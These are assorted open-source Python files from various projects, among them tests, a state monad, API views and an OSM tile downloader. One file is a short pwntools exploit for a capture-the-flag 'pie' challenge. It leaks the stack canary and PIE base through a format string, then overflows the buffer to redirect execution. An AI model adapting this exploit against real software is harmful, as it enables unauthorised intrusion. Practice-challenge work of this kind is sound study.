y = ed.transform(x)
sample = y.sample(10, seed=1).eval()
self.assertSamplePosNeg(sample)
def test_no_support(self):
with self.test_session():
x = DirichletProcess(1.0, Normal(0.0, 1.0))
with self.assertRaises(AttributeError):
y = ed.transform(x)
def test_unhandled_support(self):
with self.test_session():
FakeRV = namedtuple('FakeRV', ['support'])
x = FakeRV(support='rational')
with self.assertRaises(ValueError):
y = ed.transform(x)
if __name__ == '__main__':
tf.test.main()
|
oslash/state.py | stjordanis/OSlash | 668 | 12797765 | <filename>oslash/state.py
from typing import Callable, Tuple, Any, TypeVar, Generic
from .util import Unit
from .typing import Functor
from .typing import Monad
TState = TypeVar("TState")
TSource = TypeVar("TSource")
TResult = TypeVar("TResult")
class State(Generic[TSource, TState]):
"""The state monad.
Wraps stateful computations. A stateful computation is a function
that takes a state and returns a result and new state:
state -> (result, state')
"""
def __init__(self, fn: Callable[[TState], Tuple[TSource, TState]]) -> None:
"""Initialize a new state.
Keyword arguments:
fn -- State processor.
"""
self._fn = fn
@classmethod
def unit(cls, value: TSource) -> "State[TSource, TState]":
r"""Create new State.
The unit function creates a new State object wrapping a stateful
computation.
State $ \s -> (x, s)
"""
return cls(lambda state: (value, state))
def map(self, mapper: Callable[[TSource], TResult]) -> "State[TResult, TState]":
def _(a: Any, state: Any) -> Tuple[Any, Any]:
return mapper(a), state
return State(lambda state: _(*self.run(state)))
def bind(self, fn: Callable[[TSource], "State[TState, TResult]"]) -> "State[TResult, TState]":
r"""m >>= k = State $ \s -> let (a, s') = runState m s
in runState (k a) s'
"""
def _(result: Any, state: Any) -> Tuple[Any, Any]:
return fn(result).run(state)
return State(lambda state: _(*self.run(state)))
@classmethod
def get(cls) -> "State[TState, TState]":
r"""get = state $ \s -> (s, s)"""
return State(lambda state: (state, state))
@classmethod
def put(cls, new_state: TState) -> "State[Tuple, TState]":
r"""put newState = state $ \s -> ((), newState)"""
return State(lambda state: (Unit, new_state))
def run(self, state: TState) -> Tuple[TSource, TState]:
"""Return wrapped state computation.
This is the inverse of unit and returns the wrapped function.
"""
return self._fn(state)
def __call__(self, state: Any) -> Tuple:
return self.run(state)
assert issubclass(State, Functor)
assert issubclass(State, Monad)
|
convlab/modules/nlu/multiwoz/error.py | ngduyanhece/ConvLab | 405 | 12797822 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
"""
"""
class ErrorNLU:
"""Base model for generating NLU error."""
def __init__(self, act_type_rate=0.0, slot_rate=0.0):
"""
Args:
act_type_rate (float): The error rate applied on dialog act type.
slot_rate (float): Error rate applied on slots.
"""
self.set_error_rate(act_type_rate, slot_rate)
def set_error_rate(self, act_type_rate, slot_rate):
"""
Set error rate parameter for error model.
Args:
act_type_rate (float): The error rate applied on dialog act type.
slot_rate (float): Error rate applied on slots.
"""
self.act_type_rate = act_type_rate
self.slot_rate = slot_rate
def apply(self, dialog_act):
"""
Apply the error model on dialog act.
Args:
dialog_act (tuple): Dialog act.
Returns:
dialog_act (tuple): Dialog act with noise.
"""
#TODO
return
|
tests/scripts/thread-cert/pktverify/null_field.py | AdityaHPatwardhan/openthread | 2,962 | 12797842 | #!/usr/bin/env python3
#
# Copyright (c) 2019, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
nullField = None
class NullField(object):
"""
Represents a null field that does not exists.
"""
def __new__(cls, *args, **kwargs):
global nullField
if nullField is None:
nullField = object.__new__(cls, *args, **kwargs)
return nullField
def __init__(self):
assert self is nullField
def __bool__(self):
"""
NullField is always treated as False.
"""
return False
def __getattr__(self, item):
"""
Any sub field of the NullField is NullField itself.
"""
return self
def __setattr__(self, key, value):
pass
def __len__(self) -> 0:
return 0
def __eq__(self, other):
"""
NullField is always not equal to any other value.
"""
return False
def __ne__(self, other):
return True
def __lt__(self, other):
"""
Comparing NullField to any other value gets False.
"""
return False
def __le__(self, other):
"""
Comparing NullField to any other value gets False.
"""
return False
def __gt__(self, other):
"""
Comparing NullField to any other value gets False.
"""
return False
def __ge__(self, other):
"""
Comparing NullField to any other value gets False.
"""
return False
def __str__(self):
return "nullField"
def __repr__(self):
return 'nullField'
NullField()
if __name__ == '__main__':
assert nullField is NullField()
assert not nullField, repr(nullField)
assert nullField != nullField, repr(nullField)
assert nullField != 0
assert not (nullField > 1)
assert not (nullField < 1)
assert not (nullField < nullField)
assert not (nullField > nullField)
assert bool(nullField) is False
assert nullField != ""
assert nullField != None # noqa
assert nullField is not None
|
mmrotate/core/bbox/iou_calculators/builder.py | williamcorsel/mmrotate | 449 | 12797885 | # Copyright (c) OpenMMLab. All rights reserved.
from mmcv.utils import build_from_cfg
from mmdet.core.bbox.iou_calculators.builder import IOU_CALCULATORS
ROTATED_IOU_CALCULATORS = IOU_CALCULATORS
def build_iou_calculator(cfg, default_args=None):
"""Builder of IoU calculator."""
return build_from_cfg(cfg, ROTATED_IOU_CALCULATORS, default_args)
|
tests/converter/test_url2netloc.py | Centaurioun/PyFunceble | 213 | 12797888 | """
The tool to check the availability or syntax of domain, IP or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Tests of URL 2 Network Location converter.
Author:
<NAME>, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/special-thanks.html
Contributors:
https://pyfunceble.github.io/contributors.html
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/dev/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020, 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import unittest.mock
from PyFunceble.converter.url2netloc import Url2Netloc
class TestUrl2Netloc(unittest.TestCase):
"""
Tests our internal URL converter.
"""
def setUp(self) -> None:
"""
Setups everything needed for the tests.
"""
self.converter = Url2Netloc()
def tearDown(self) -> None:
"""
Destroys everything previously created for the tests.
"""
del self.converter
def test_set_data_to_convert_no_string(self) -> None:
"""
Tests the method which let us set the data to work with for the case
that a non-string value is given.
"""
given = ["Hello", "World"]
self.assertRaises(TypeError, lambda: self.converter.set_data_to_convert(given))
def test_set_data_to_convert_empty_string(self) -> None:
"""
Tests the method which let us set the data to work with for the case
that an empty-string value is given.
"""
given = ""
self.assertRaises(ValueError, lambda: self.converter.set_data_to_convert(given))
def test_get_converted_nothing_to_decode(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that no conversion is needed.
"""
given = "example.org"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_full_url(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that a full URL is given.
"""
given = "https://example.org/hello/world/this/is/a/test"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_full_url_with_port(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that a full URL (with explicit port) is given.
"""
given = "https://example.org:8080/hello/world/this/is/a/test"
expected = "example.org:8080"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_full_url_with_params(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that a full URL (with params) is given.
"""
given = "https://example.org/?is_admin=true"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_scheme(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that no scheme is given.
"""
given = "example.org/hello/world/this/is/a/test"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_scheme_and_with_params(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that no scheme (but with params) is given.
"""
given = "example.org/?is_admin=true"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_protocol(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that no protocol is given.
"""
given = "://example.org/hello/world/this/is/a/test"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_protocol_and_with_params(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that no protocol (but params) is given.
"""
given = "://example.org/?is_admin=true"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_protocol_and_path(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that no protocol and path is given.
"""
given = "://example.org/"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_startswith_2_slashes(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that the given url starts with 2 slashes.
"""
given = "//example.org/hello/world/this/is/a/test"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_startswith_1_slash(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that the given url starts with 1 slash.
"""
given = "/example.org/hello/world/this/is/a/test"
expected = ""
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
if __name__ == "__main__":
unittest.main()
|
nemo/collections/common/losses/aggregator.py | hamjam/NeMo | 4,145 | 12797934 | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List
import torch
from nemo.core.classes import Loss, typecheck
from nemo.core.neural_types import LossType, NeuralType
__all__ = ['AggregatorLoss']
class AggregatorLoss(Loss):
"""
Sums several losses into one.
Args:
num_inputs: number of input losses
weights: a list of coefficient for merging losses
"""
@property
def input_types(self):
"""Returns definitions of module input ports.
"""
input_types = {}
for i in range(self._num_losses):
input_types["loss_" + str(i + 1)] = NeuralType(elements_type=LossType())
return input_types
@property
def output_types(self):
"""Returns definitions of module output ports.
"""
return {"loss": NeuralType(elements_type=LossType())}
def __init__(self, num_inputs: int = 2, weights: List[float] = None):
super().__init__()
self._num_losses = num_inputs
if weights is not None and len(weights) != num_inputs:
raise ValueError("Length of weights should be equal to the number of inputs (num_inputs)")
self._weights = weights
@typecheck()
def forward(self, **kwargs):
values = [kwargs[x] for x in sorted(kwargs.keys())]
loss = torch.zeros_like(values[0])
for loss_idx, loss_value in enumerate(values):
if self._weights is not None:
loss = loss.add(loss_value, alpha=self._weights[loss_idx])
else:
loss = loss.add(loss_value)
return loss
|
tensorflow/contrib/distributions/python/kernel_tests/estimator_test.py | tianyapiaozi/tensorflow | 848 | 12797975 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for estimator.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import six
from tensorflow.contrib.distributions.python.ops import estimator as estimator_lib
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_metrics
from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_no_variables
from tensorflow.contrib.learn.python.learn.estimators.head_test import _assert_summary_tags
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops.distributions import normal as normal_lib
from tensorflow.python.platform import test
class EstimatorHeadDistributionRegressionTest(test.TestCase):
def _assert_output_alternatives(self, model_fn_ops):
self.assertEquals({
None: constants.ProblemType.LINEAR_REGRESSION
}, {
k: v[0] for k, v in six.iteritems(model_fn_ops.output_alternatives)
})
def testNormalLocScaleLogits(self):
# We will bias logits[..., 1] so that: logits[..., 1]=0 implies scale=1.
scale_bias = np.log(np.expm1(1.))
def softplus(x):
return np.log1p(np.exp(x))
def actual_loss(logits, labels):
mu = actual_mean(logits)
sigma = actual_stddev(logits)
labels = np.squeeze(labels, -1)
z = (labels - mu) / sigma
loss = 0.5 * (z**2. + np.log(2. * np.pi)) + np.log(sigma)
return loss.mean()
def actual_mean(logits):
return logits[..., 0]
def actual_stddev(logits):
return softplus(logits[..., 1] + scale_bias)
def make_distribution_fn(logits):
return normal_lib.Normal(
loc=logits[..., 0],
scale=nn_ops.softplus(logits[..., 1] + scale_bias))
head = estimator_lib.estimator_head_distribution_regression(
make_distribution_fn,
logits_dimension=2)
labels = np.float32([[-1.],
[0.],
[1.]])
logits = np.float32([[0., -1],
[1, 0.5],
[-1, 1]])
with ops.Graph().as_default(), session.Session():
# Convert to tensor so we can index into head.distributions.
tflogits = ops.convert_to_tensor(logits, name="logits")
model_fn_ops = head.create_model_fn_ops(
{},
labels=labels,
mode=model_fn.ModeKeys.TRAIN,
train_op_fn=head_lib.no_op_train_fn,
logits=tflogits)
self._assert_output_alternatives(model_fn_ops)
_assert_summary_tags(self, ["loss"])
_assert_no_variables(self)
loss = actual_loss(logits, labels)
_assert_metrics(self, loss, {"loss": loss}, model_fn_ops)
# Now we verify the underlying distribution was correctly constructed.
expected_mean = logits[..., 0]
self.assertAllClose(
expected_mean,
head.distribution(tflogits).mean().eval(),
rtol=1e-6, atol=0.)
expected_stddev = softplus(logits[..., 1] + scale_bias)
self.assertAllClose(
expected_stddev,
head.distribution(tflogits).stddev().eval(),
rtol=1e-6, atol=0.)
# Should have created only one distribution.
self.assertEqual(1, len(head.distributions))
if __name__ == "__main__":
test.main()
|
seahub/organizations/api/users.py | samuelduann/seahub | 420 | 12797976 | # Copyright (c) 2012-2016 Seafile Ltd.
import logging
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.authentication import SessionAuthentication
from seaserv import ccnet_api
from seahub.api2.permissions import IsProVersion
from seahub.api2.throttling import UserRateThrottle
from seahub.api2.authentication import TokenAuthentication
from seahub.api2.utils import api_error
from seahub.api2.endpoints.utils import is_org_user
from seahub.utils import is_valid_email
from seahub.base.accounts import User
from seahub.base.templatetags.seahub_tags import email2nickname
from seahub.profile.models import Profile
logger = logging.getLogger(__name__)
def get_user_info(email):
profile = Profile.objects.get_profile_by_user(email)
info = {}
info['email'] = email
info['name'] = email2nickname(email)
info['contact_email'] = profile.contact_email if profile and profile.contact_email else ''
return info
class OrgAdminUser(APIView):
authentication_classes = (TokenAuthentication, SessionAuthentication)
throttle_classes = (UserRateThrottle,)
permission_classes = (IsProVersion,)
def put(self, request, org_id, email):
""" update name of an org user.
Permission checking:
1. only admin can perform this action.
"""
# resource check
org_id = int(org_id)
if not ccnet_api.get_org_by_id(org_id):
error_msg = 'Organization %s not found.' % org_id
return api_error(status.HTTP_404_NOT_FOUND, error_msg)
try:
user = User.objects.get(email=email)
except User.DoesNotExist:
error_msg = 'User %s not found.' % email
return api_error(status.HTTP_404_NOT_FOUND, error_msg)
# permission check
if not request.user.org.is_staff:
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
if request.user.org.org_id != org_id:
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
if not is_org_user(email, org_id):
error_msg = 'Permission denied.'
return api_error(status.HTTP_403_FORBIDDEN, error_msg)
# update user's name
name = request.data.get("name", None)
if name is not None:
name = name.strip()
if len(name) > 64:
error_msg = 'Name is too long (maximum is 64 characters).'
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
if "/" in name:
error_msg = "Name should not include '/'."
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
try:
Profile.objects.add_or_update(email, nickname=name)
except Exception as e:
logger.error(e)
error_msg = 'Internal Server Error'
return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)
# update user's contact email
contact_email = request.data.get("contact_email", None)
if contact_email is not None:
contact_email = contact_email.strip()
if contact_email != '' and not is_valid_email(contact_email):
error_msg = 'contact_email invalid.'
return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
try:
Profile.objects.add_or_update(email, contact_email=contact_email)
except Exception as e:
logger.error(e)
error_msg = 'Internal Server Error'
return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)
info = get_user_info(email)
info['is_active'] = user.is_active
return Response(info)
|
tests/modules/transformer/bimodal_attention_test.py | MSLars/allennlp | 11,433 | 12797992 | <gh_stars>1000+
import torch
import pytest
from allennlp.common import Params
from allennlp.modules.transformer import BiModalAttention
@pytest.fixture
def params_dict():
return {
"hidden_size1": 6,
"hidden_size2": 4,
"combined_hidden_size": 16,
"num_attention_heads": 2,
"dropout1": 0.1,
"dropout2": 0.2,
}
@pytest.fixture
def params(params_dict):
return Params(params_dict)
@pytest.fixture
def biattention(params):
return BiModalAttention.from_params(params.duplicate())
def test_can_construct_from_params(biattention, params_dict):
assert biattention.num_attention_heads == params_dict["num_attention_heads"]
assert biattention.attention_head_size == int(
params_dict["combined_hidden_size"] / params_dict["num_attention_heads"]
)
assert (
biattention.all_head_size
== params_dict["num_attention_heads"] * biattention.attention_head_size
)
assert biattention.query1.in_features == params_dict["hidden_size1"]
assert biattention.key1.in_features == params_dict["hidden_size1"]
assert biattention.value1.in_features == params_dict["hidden_size1"]
assert biattention.dropout1.p == params_dict["dropout1"]
assert biattention.query2.in_features == params_dict["hidden_size2"]
assert biattention.key2.in_features == params_dict["hidden_size2"]
assert biattention.value2.in_features == params_dict["hidden_size2"]
assert biattention.dropout2.p == params_dict["dropout2"]
def test_forward_runs(biattention):
biattention(
torch.randn(2, 3, 6),
torch.randn(2, 3, 4),
torch.randint(0, 2, (2, 2, 3, 3)) == 1, # creating boolean tensors
torch.randint(0, 2, (2, 2, 3, 3)) == 1,
)
|
src/third_party/angle/third_party/glmark2/src/waflib/Tools/dmd.py | goochen/naiveproxy | 2,151 | 12798000 | <reponame>goochen/naiveproxy
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file
import sys
from waflib.Tools import ar,d
from waflib.Configure import conf
@conf
def find_dmd(conf):
conf.find_program(['dmd','dmd2','ldc'],var='D')
out=conf.cmd_and_log(conf.env.D+['--help'])
if out.find("D Compiler v")==-1:
out=conf.cmd_and_log(conf.env.D+['-version'])
if out.find("based on DMD v1.")==-1:
conf.fatal("detected compiler is not dmd/ldc")
@conf
def common_flags_ldc(conf):
v=conf.env
v.DFLAGS=['-d-version=Posix']
v.LINKFLAGS=[]
v.DFLAGS_dshlib=['-relocation-model=pic']
@conf
def common_flags_dmd(conf):
v=conf.env
v.D_SRC_F=['-c']
v.D_TGT_F='-of%s'
v.D_LINKER=v.D
v.DLNK_SRC_F=''
v.DLNK_TGT_F='-of%s'
v.DINC_ST='-I%s'
v.DSHLIB_MARKER=v.DSTLIB_MARKER=''
v.DSTLIB_ST=v.DSHLIB_ST='-L-l%s'
v.DSTLIBPATH_ST=v.DLIBPATH_ST='-L-L%s'
v.LINKFLAGS_dprogram=['-quiet']
v.DFLAGS_dshlib=['-fPIC']
v.LINKFLAGS_dshlib=['-L-shared']
v.DHEADER_ext='.di'
v.DFLAGS_d_with_header=['-H','-Hf']
v.D_HDR_F='%s'
def configure(conf):
conf.find_dmd()
if sys.platform=='win32':
out=conf.cmd_and_log(conf.env.D+['--help'])
if out.find('D Compiler v2.')>-1:
conf.fatal('dmd2 on Windows is not supported, use gdc or ldc2 instead')
conf.load('ar')
conf.load('d')
conf.common_flags_dmd()
conf.d_platform_flags()
if str(conf.env.D).find('ldc')>-1:
conf.common_flags_ldc()
|
redteamvillage2021/pie/exploit.py | nhtri2003gmail/ctf-write-ups | 101 | 12798034 | <gh_stars>100-1000
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./pie')
if args.REMOTE:
p = remote('pwnremote.threatsims.com', 9002)
else:
p = process(binary.path)
p.sendlineafter('?\n','%11$10p%15$10p')
p.recvuntil('command: ')
canary = int(p.recv(10),16)
log.info('canary: ' + hex(canary))
main = int(p.recv(10),16) - 95
log.info('main: ' + hex(main))
binary.address = main - binary.sym.main
log.info('binary.address: ' + hex(binary.address))
payload = b''
payload += (0x21 - 0x10) * b'A'
payload += p32(canary)
payload += (0x21 - len(payload)) * b'B'
payload += p32(binary.sym.helperfunc)
p.sendlineafter('?',payload)
p.interactive()
|
generate/generate/tests/__init__.py | flamencist/browser-extensions | 102 | 12798042 | def dummy_config():
return {
'uuid': 'TEST-UUID',
'main': {
'server': 'https://test.forge.io/api/'
}
} |
vimfiles/bundle/vim-python/submodules/pylint/tests/functional/n/non/non_ascii_name.py | ciskoinch8/vimrc | 463 | 12798064 | """ Tests for non-ascii-name checker. """
áéíóú = 4444 # [non-ascii-name]
def úóíéá(): # [non-ascii-name]
"""yo"""
|
src/btt/questions/admin.py | kevinkissi/basic-tech-tips-webapp | 116 | 12798114 | <reponame>kevinkissi/basic-tech-tips-webapp
from django.contrib import admin
from django.apps import apps
questions = apps.get_app_config('questions')
for model_name, model in questions.models.items():
admin.site.register(model)
|
en/verbocean_to_json.py | yuichigoto/ccg2lambda | 200 | 12798116 | <filename>en/verbocean_to_json.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
from collections import defaultdict
import gzip
import json
parser = argparse.ArgumentParser()
parser.add_argument("infile")
parser.add_argument("outfile")
args = parser.parse_args()
def load_verbocean(verbocean_filename):
relations = dict()
with gzip.open(verbocean_filename, 'rt', 'utf-8') as fin:
for line in fin:
if not line.startswith('#'):
verb1, rel, verb2 = line.split()[0:3]
if verb1 not in relations:
relations[verb1] = defaultdict(set)
relations[verb1][verb2].add(rel.strip('[]'))
return relations
verbocean = load_verbocean(args.infile)
for v1, d in verbocean.items():
for v2, rels in d.items():
verbocean[v1][v2] = list(rels)
with open(args.outfile, 'w') as fout:
json.dump(verbocean, fout, indent=2)
|
rx/core/operators/catch.py | mmpio/RxPY | 4,342 | 12798120 | from typing import Callable, Union
import rx
from rx.core import Observable, typing
from rx.disposable import SingleAssignmentDisposable, SerialDisposable
from rx.internal.utils import is_future
def catch_handler(source: Observable, handler: Callable[[Exception, Observable], Observable]) -> Observable:
def subscribe(observer, scheduler=None):
d1 = SingleAssignmentDisposable()
subscription = SerialDisposable()
subscription.disposable = d1
def on_error(exception):
try:
result = handler(exception, source)
except Exception as ex: # By design. pylint: disable=W0703
observer.on_error(ex)
return
result = rx.from_future(result) if is_future(result) else result
d = SingleAssignmentDisposable()
subscription.disposable = d
d.disposable = result.subscribe(observer, scheduler=scheduler)
d1.disposable = source.subscribe_(
observer.on_next,
on_error,
observer.on_completed,
scheduler
)
return subscription
return Observable(subscribe)
def _catch(handler: Union[Observable, Callable[[Exception, Observable], Observable]]
) -> Callable[[Observable], Observable]:
def catch(source: Observable) -> Observable:
"""Continues an observable sequence that is terminated by an
exception with the next observable sequence.
Examples:
>>> op = catch(ys)
>>> op = catch(lambda ex, src: ys(ex))
Args:
handler: Second observable sequence used to produce
results when an error occurred in the first sequence, or an
exception handler function that returns an observable sequence
given the error and source observable that occurred in the
first sequence.
Returns:
An observable sequence containing the first sequence's
elements, followed by the elements of the handler sequence
in case an exception occurred.
"""
if callable(handler):
return catch_handler(source, handler)
elif isinstance(handler, typing.Observable):
return rx.catch(source, handler)
else:
raise TypeError('catch operator takes whether an Observable or a callable handler as argument.')
return catch
|
scripts/download_osm_tiles.py | MartinRusk/stratux | 104 | 12798131 | #!/usr/bin/python3
from sys import argv
import os
import math
import urllib.request
import random
import os.path
import sqlite3
URL_TEMPLATE = "https://c.tile.openstreetmap.org/%d/%d/%d.png"
BBOX = None # [lon_min, lat_min, lon_max, lat_max] or None for whole world
ZOOM_MAX = 7
LAYERTYPE = "baselayer" # "baselayer" or "overlay"
LAYERNAME = "OSM Low Detail"
TILE_FORMAT = "png"
def deg2num(lat_deg, lon_deg, zoom):
lat_rad = math.radians(lat_deg)
n = 2.0 ** zoom
xtile = int((lon_deg + 180.0) / 360.0 * n)
ytile = int((1.0 - math.log(math.tan(lat_rad) + (1 / math.cos(lat_rad))) / math.pi) / 2.0 * n)
return (xtile, ytile)
def download_url(zoom, xtile, ytile, cursor):
subdomain = random.randint(1, 4)
url = URL_TEMPLATE % (zoom, xtile, ytile)
ymax = 1 << zoom
yinverted = ymax - ytile - 1
existing = cursor.execute('SELECT count(*) FROM tiles WHERE zoom_level=? AND tile_column=? AND tile_row=?', (zoom, xtile, yinverted)).fetchall()
if existing[0][0] > 0:
print('Skipping ' + url)
return
print("downloading %r" % url)
request = urllib.request.Request(
url, data=None,
headers={
'User-Agent': 'Low-Zoom Downloader'
}
)
source = urllib.request.urlopen(request)
content = source.read()
source.close()
cursor.execute('INSERT INTO tiles(zoom_level, tile_column, tile_row, tile_data) VALUES(?, ?, ?, ?)', (zoom, xtile, yinverted, content))
def main(argv):
db = argv[1] if len(argv) > 1 else 'osm.mbtiles'
conn = sqlite3.connect(db)
cur = conn.cursor()
bboxStr = "-180,-85,180,85" if BBOX is None else ",".join(map(str, BBOX))
cur.executescript('''
CREATE TABLE IF NOT EXISTS tiles (
zoom_level integer,
tile_column integer,
tile_row integer,
tile_data blob);
CREATE TABLE IF NOT EXISTS metadata(name text, value text);
CREATE UNIQUE INDEX IF NOT EXISTS metadata_name on metadata (name);
CREATE UNIQUE INDEX IF NOT EXISTS tile_index on tiles(zoom_level, tile_column, tile_row);
INSERT OR REPLACE INTO metadata VALUES('minzoom', '1');
INSERT OR REPLACE INTO metadata VALUES('maxzoom', '{0}');
INSERT OR REPLACE INTO metadata VALUES('name', '{1}');
INSERT OR REPLACE INTO metadata VALUES('type', '{2}');
INSERT OR REPLACE INTO metadata VALUES('format', '{3}');
INSERT OR REPLACE INTO metadata VALUES('bounds', '{4}');
'''.format(ZOOM_MAX, LAYERNAME, LAYERTYPE, TILE_FORMAT, bboxStr))
# from 0 to 6 download all
for zoom in range(0, ZOOM_MAX+1):
xstart = 0
ystart = 0
xend = 2**zoom-1
yend = 2**zoom-1
if BBOX is not None:
xstart, yend = deg2num(BBOX[1], BBOX[0], zoom)
xend, ystart = deg2num(BBOX[3], BBOX[2], zoom)
for x in range(xstart, xend+1):
